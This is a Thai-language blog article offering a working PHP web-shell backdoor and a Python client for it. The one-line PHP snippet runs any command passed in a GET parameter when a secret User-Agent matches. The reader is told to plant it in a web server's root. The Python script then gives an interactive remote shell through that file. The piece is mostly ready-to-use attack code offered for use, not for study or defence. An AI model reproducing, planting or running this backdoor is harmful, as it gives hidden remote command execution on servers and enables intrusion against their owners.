บทความนี้เป็น Python Script สำหรับเข้าถึง Command-Line Interface ที่เป็นผู้ใช้สิทธิ์ต่ำกว่าผู้ดูแล ของเว็บเซิร์ฟเวอร์ระบบปฏิบัติการใดก็ได้ จากการวางโค้ด PHP สั้น ๆ ที่จะรับคำสั่งและรันบนฟังก์ชั่น system(); ลงบนไฟล์นามสกุล .php ไฟล์ใดไฟล์หนึ่ง ที่อยู่ภายใน Root Directory เรียกง่าย ๆ คือการทำ Backdoor อย่างง่ายเพื่อที่จะสามารถควบคุม Shell จากภายนอกได้ โดยมีเงื่อนไขการเข้าถึง Shell จากค่า HTTP USER AGENT ง่าย ๆ ทำหน้าที่เหมือนแม่กุญแจ ซึ่ง Python Script ตัวนี้ ก็เหมือนกับ "กุญแจ" ที่มีค่า HTTP USER AGENT ตรงกับเงื่อนไขของโค้ด PHP ที่ได้วางไว้ สามารถไขเข้าไปได้ และผู้อื่นไม่สามารถยิงคำสั่งผ่านค่า GET สด ๆ ได้ หากไม่รู้ค่าในเงื่อนไข HTTP USER AGENT

อย่างที่ทราบดีว่า PHP เป็นภาษาที่ทำงานฝั่งเซิร์ฟเวอร์ และตอบกลับเป็น HTML กลับมา ทำให้ผู้ใช้ ไม่สามารถอ่าน Source Code PHP ได้เลยในฝั่งลูกข่าย จึงเป็นเหตุผลที่เลือกใช้ PHP แทนที่จะเป็น Javascript
* การตั้งค่า HTTP USER AGENT ใหม่ ที่ไม่ซ้ำใครก็เป็นการเพิ่มความปลอดภัย ไม่ให้ผู้อื่นสามารถเดา หรือเปิดอ่านเงื่อนไข USER AGENT ที่เรากำหนดไว้ได้

Module ของ Python ที่ต้องติดตั้งเพิ่มได้แก่ requests โดยใช้คำสั่ง

pip install requests หรือ python -m pip install requests
ไฟล์ CoS_!Backend.py
import requests
import os

def banner():
  print(
  "                                                       ",
  " /$$$$$$       /$$$$$$    /$$ /$$$$$$$           /$$                 /$$",
  " /$$__ $$      /$$__ $$   | $$| $$__ $$          | $$                | $$",
  "| $$ \__/ /$$$$$$ | $$ \__/   | $$| $$ \ $$ /$$$$$$  /$$$$$$$| $$  /$$ /$$$$$$ /$$$$$$$  /$$$$$$$",
  "| $$    /$$__ $$| $$$$$$    | $$| $$$$$$$ |____ $$ /$$_____/| $$ /$$/ /$$__ $$| $$__ $$ /$$__ $$",
  "| $$   | $$ \ $$ \____ $$   |__/| $$__ $$ /$$$$$$$| $$   | $$$$$$/ | $$$$$$$$| $$ \ $$| $$ | $$",
  "| $$  $$| $$ | $$ /$$ \ $$     | $$ \ $$ /$$__ $$| $$   | $$_ $$ | $$_____/| $$ | $$| $$ | $$",
  "| $$$$$$/| $$$$$$/| $$$$$$/    /$$| $$$$$$$/| $$$$$$$| $$$$$$$| $$ \ $$| $$$$$$$| $$ | $$| $$$$$$$",
  " \______/ \______/ \______//$$$$$$|__/|_______/ \_______/ \_______/|__/ \__/ \_______/|__/ |__/ \_______/",
  "              |______/                                     ", 
  "                                                       ",
  "                 .:: CoS_!Backend by Costerraid Studio ::.                  ",
  "                      A PHP Shell Remote!                        ",
  "       -----------------------------------------------------------------------------",
  "              >> Copy AnD pasTe this BackEnd C0de to PHP FIle. <<      ",
  "                                             ",
  "             if($_SERVER['HTTP_USER_AGENT'] == 'cosbackend_84694f     ",
  "             e67f64babd0d57030a130f0bf9') {print(system($_GET['c']));}    ",
  "       -----------------------------------------------------------------------------",
  "                                                       ",
  sep="\n")

def cls():
  os.system('cls' if os.name=='nt' else 'clear')

cls()
banner()

h = input("hostnaMe? >> ")
ef = input("http://"+h+"/(FIle Path).php >> ")
headers = {'User-Agent': 'cosbackend_84694fe67f64babd0d57030a130f0bf9'}
check_user = "http://"+h+"/"+ef+"?c=whoami"
whoami = requests.get(check_user, headers=headers).text
if(whoami != ""):
  while True:
    fl = input("[+] Logged in as "+whoami+" #> ")
    print("-"*50)
    c_url = "http://"+h+"/"+ef+"?c="+fl
    print(requests.get(c_url, headers=headers).text)
    print("-"*50)
    if(fl == "exit"):
      cls()
      break
    if(fl == "clear"):
      cls()
      banner()
else:
  print("[-] CaN't r3questS tO FilE : U5er-Ag3nt NOt Match !")

บทความที่ถูกอ่านล่าสุด

ใช้ Python เป็น Command-Line Interface สำหรับ PHP Backdoor

บทความนี้เป็น Python Script สำหรับเข้าถึง Command-Line Interface ที่เป็นผู้ใช้สิทธิ์ต่ำกว่าผู้ดูแล ของเว็บเซิร์ฟเวอร์ระบบปฏิบัติการใดก็ได้ จากการวางโค้ด PHP ...

ที่อยู่: 3.233.239.102

ติดตั้ง Linux บน Windows 8/10 โดยใช้ WSL

Microsoft ได้เปิด Features ใหม่ที่ชื่อว่า "Windows Subsystem for Linux" (WSL) เป็นนำระบบปฏิบัติการ Linux ต่างๆ ได้แก่ Ubuntu, ...

ที่อยู่: 3.233.239.102

PHP เบื้องต้น บทที่ 2 การเชื่อมต่อฐานข้อมูล

สวัสดีครับในบทความนี้ผมจะพามาเรียนรู้วิธี การเชื่อมต่อกับฐานข้อมูล MYSQL และการ Query หรือส่งคำสั่งและดึงข้อมูลเบื้องต้นบนภาษา PHP โดยสำหรับ...

ที่อยู่: 3.233.239.102

ถ่ายโอนไฟล์บน FTP Protocol ด้วย FileZilla Client/Server

File Transfer Protocol (FTP) เป็น Protocol เครือข่ายมาตรฐานสำหรับการถ่ายโอนไฟล์ระหว่าง Client กับ Server บนเครือข่ายคอมพิวเตอร์ Port 21 FileZilla เป็น Free ware ที่ผู้ใช้สามารถเลื...

ที่อยู่: 183.89.90.97

ป้องกัน DoS/DDoS บน Apache ด้วยโมดูล mod_evasive (Linux)

สวัสดีครับ ในบทความนี้ผมจะมาแนะนำขั้นตอนการติดตั้งโมดูล mod_evasive สำหรับ Apache บนระบบปฏิบัติการ Ubuntu โดยมันสามารถป้องกันการ DoS/DDoS รวมถึง brute force...

ที่อยู่: 66.249.64.84


บทความแนะนำ

ทำความรู้จักกับ ไวรัส และ มัลแวร์

ไม่มี Fixed IP ก็เปิดเซิร์ฟเวอร์ได้ฟรี ๆ ด้วยบริการ No-IP

PHP Trick: ตัดตัวอักษรอื่นนอกจาก a-z A-Z 0-9 ออกจากตัวแปร

แก้ปัญหา Disk และ CPU ขึ้น 100% ใน Task manager (Windows)

ยอดอ่านสูงสุด

แก้ปัญหา Disk และ CPU ขึ้น 100% ใน Task manager (Windows)

Hardware

Storage


พื้นที่ว่างคงเหลือ 843.04 GB

ติดตามเราบน Facebook